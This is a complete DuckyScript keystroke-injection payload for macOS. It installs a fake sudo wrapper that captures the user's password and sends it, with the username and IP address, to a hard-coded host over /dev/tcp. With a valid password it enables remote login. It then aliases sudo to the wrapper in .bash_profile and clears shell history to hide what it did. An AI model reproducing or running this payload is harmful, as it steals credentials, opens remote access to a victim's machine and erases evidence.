REM Modified by toledo
REM ------ Open terminal -----
DELAY 1000
GUI SPACE
STRING terminal
DELAY 500
ENTER
REM ------ Create script -------
DELAY 500
STRING mkdir -p ~/.config/sudo
ENTER
DELAY 200
REM ------- Bash code ---------------
STRING echo '#!/bin/bash
ENTER

STRING SERVER=/dev/tcp/10.43.102.172/1337
ENTER
STRING ADDRESS=$(ipconfig getifaddr en0)
ENTER
STRING echo "You got ducked! Be careful"
ENTER
STRING /usr/bin/sudo -n true 2>/dev/null
ENTER
STRING if [ $? -eq 0 ]
ENTER
STRING then
ENTER
STRING /usr/bin/sudo $@
ENTER
STRING else
ENTER
STRING   while true; do
ENTER
STRING     echo -n "Password:"
ENTER
STRING     read -s password
ENTER
STRING     echo
ENTER
STRING     echo "$password" | /usr/bin/sudo -S true 2>/dev/null
ENTER
STRING     if [ $? -eq 1 ]
ENTER
STRING     then
ENTER
STRING     echo "$(date) $USER:$password@$ADDRESS -> invalid" > $SERVER
ENTER
STRING     echo "Sorry, try again."
ENTER
STRING     else
ENTER
STRING     echo "$(date) $USER:$password@$ADDRESS -> valid" > $SERVER
ENTER
STRING     sudo systemsetup -setremotelogin on >/dev/null
ENTER
STRING     break
ENTER
STRING     fi
ENTER
STRING   done
ENTER
STRING fi
ENTER

STRING ' > ~/.config/sudo/sudo
ENTER
DELAY 500
REM -------- Make script a executable ---------
STRING chmod u+x ~/.config/sudo/sudo
ENTER
DELAY 500
REM -------- Make the user execute our 'sudo' command instead of the real one ----------
STRING echo "alias 'sudo'='~/.config/sudo/sudo'" >> ~/.bash_profile
ENTER
DELAY 500
REM --------- Cleanup to leave no trace
STRING history -c && rm .bash_history && exit
ENTER
DELAY 500
GUI q